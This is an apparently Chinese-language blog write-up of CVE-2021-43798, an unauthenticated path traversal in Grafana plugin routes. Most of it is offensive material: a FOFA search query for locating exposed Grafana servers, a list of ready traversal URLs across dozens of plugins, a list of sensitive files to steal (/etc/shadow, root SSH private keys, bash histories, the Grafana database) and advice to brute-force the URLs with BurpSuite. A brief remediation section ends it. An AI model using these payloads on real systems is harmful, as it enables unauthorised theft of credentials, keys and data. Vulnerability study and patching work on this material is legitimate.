CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞

CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞

目录

漏洞原理

漏洞信息

受影响版本

FOFA搜集相关资产

漏洞分析&漏洞复现

解决方案


漏洞原理

       Grafana是一个跨平台、开源的数据可视化网络应用程序平台。用户配置连接的数据源之后,Grafana可以在网络浏览器里显示数据图表和警告。
       Grafana 存在未授权任意文件读取漏洞,攻击者在未经身份验证的情况下可通过该漏洞读取主机上的任意文件。
       攻击者可以通过将包含特殊目录便利字符序列(../)的特制HTTP请求发送到受影响的设备来利用此漏洞,成功利用该漏洞的攻击者可以在目标设备上查看文件系统上的任意文件。

漏洞信息

CVE: CVE-2021-43798
CVSS: 7.5

受影响版本

Grafana 8.0.0-beta1 to 8.3.0

FOFA搜集相关资产

app="Grafana"

漏洞分析&漏洞复现

CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞_第1张图片CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞_第2张图片

读取敏感文件复现poc

/public/plugins/alertlist/../../../../../../../../etc/passwd

CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞_第3张图片

读取数据库文件 

CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞_第4张图片

读取配置文件

CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞_第5张图片 还可以读取的其他文件

/conf/defaults.ini

/etc/grafana/grafana.ini

/etc/passwd

/etc/shadow

/home/grafana/.bash_history

/home/grafana/.ssh/id_rsa

/root/.bash_history

/root/.ssh/id_rsa

/usr/local/etc/grafana/grafana.ini

/var/lib/grafana/grafana.db

/proc/net/fib_trie

/proc/net/tcp

/proc/self/cmdline

该漏洞由于Grafana Plugins引发的目录穿越漏洞导致任意文件读取,上述截图仅展示了grafana-clock-panel插件的效果。官方公布的受影响Plugins为40个。

/public/plugins/alertGroups/../../../../../../../../etc/passwd
/public/plugins/alertlist/../../../../../../../../etc/passwd
/public/plugins/alertmanager/../../../../../../../../etc/passwd
/public/plugins/annolist/../../../../../../../../etc/passwd
/public/plugins/barchart/../../../../../../../../etc/passwd
/public/plugins/bargauge/../../../../../../../../etc/passwd
/public/plugins/canvas/../../../../../../../../etc/passwd
/public/plugins/cloudwatch/../../../../../../../../etc/passwd
/public/plugins/dashboard/../../../../../../../../etc/passwd
/public/plugins/dashlist/../../../../../../../../etc/passwd
/public/plugins/debug/../../../../../../../../etc/passwd
/public/plugins/elasticsearch/../../../../../../../../etc/passwd
/public/plugins/gauge/../../../../../../../../etc/passwd
/public/plugins/geomap/../../../../../../../../etc/passwd
/public/plugins/gettingstarted/../../../../../../../../etc/passwd
/public/plugins/grafana-azure-monitor-datasource/../../../../../../../../etc/passwd
/public/plugins/grafana/../../../../../../../../etc/passwd
/public/plugins/graph/../../../../../../../../etc/passwd
/public/plugins/graphite/../../../../../../../../etc/passwd
/public/plugins/heatmap/../../../../../../../../etc/passwd
/public/plugins/histogram/../../../../../../../../etc/passwd
/public/plugins/influxdb/../../../../../../../../etc/passwd
/public/plugins/jaeger/../../../../../../../../etc/passwd
/public/plugins/live/../../../../../../../../etc/passwd
/public/plugins/logs/../../../../../../../../etc/passwd
/public/plugins/loki/../../../../../../../../etc/passwd
/public/plugins/mixed/../../../../../../../../etc/passwd
/public/plugins/mssql/../../../../../../../../etc/passwd
/public/plugins/mysql/../../../../../../../../etc/passwd
/public/plugins/news/../../../../../../../../etc/passwd
/public/plugins/nodeGraph/../../../../../../../../etc/passwd
/public/plugins/opentsdb/../../../../../../../../etc/passwd
/public/plugins/piechart/../../../../../../../../etc/passwd
/public/plugins/pluginlist/../../../../../../../../etc/passwd
/public/plugins/postgres/../../../../../../../../etc/passwd
/public/plugins/prometheus/../../../../../../../../etc/passwd
/public/plugins/stat/../../../../../../../../etc/passwd
/public/plugins/state-timeline/../../../../../../../../etc/passwd
/public/plugins/status-history/../../../../../../../../etc/passwd
/public/plugins/table-old/../../../../../../../../etc/passwd
/public/plugins/table/../../../../../../../../etc/passwd
/public/plugins/tempo/../../../../../../../../etc/passwd
/public/plugins/testdata/../../../../../../../../etc/passwd
/public/plugins/text/../../../../../../../../etc/passwd
/public/plugins/timeseries/../../../../../../../../etc/passwd
/public/plugins/welcome/../../../../../../../../etc/passwd
/public/plugins/xychart/../../../../../../../../etc/passwd
/public/plugins/zipkin/../../../../../../../../etc/passwd

因为受影响的插件太多,所以建议使用BurpSuite工具爆破一波

CVE-2021-43798 Grafana 未经授权的任意文件读取漏洞_第6张图片

解决方案

v8.0.0-beta1 和 v8.3.0 之间的所有安装都应尽快升级。

如果无法升级,在 Grafana 前运行反向代理来规范化请求的 PATH 将缓解该漏洞。例如,envoy 中的normalize_path设置。

得益于我们的深度防御方法,Grafana Cloud实例并未受到该漏洞的影响。

与往常一样,我们与所有许可提供 Grafana Pro 的云提供商密切协调。他们已收到禁运的早期通知,并确认他们的产品在本公告发布时是安全的。按字母顺序,这适用于 Amazon Managed Grafana 和 Azure Managed Grafana。

本文参考:GitHub - jas502n/Grafana-CVE-2021-43798: Grafana Unauthorized arbitrary file reading vulnerability

你可能感兴趣的:(漏洞学习,安全)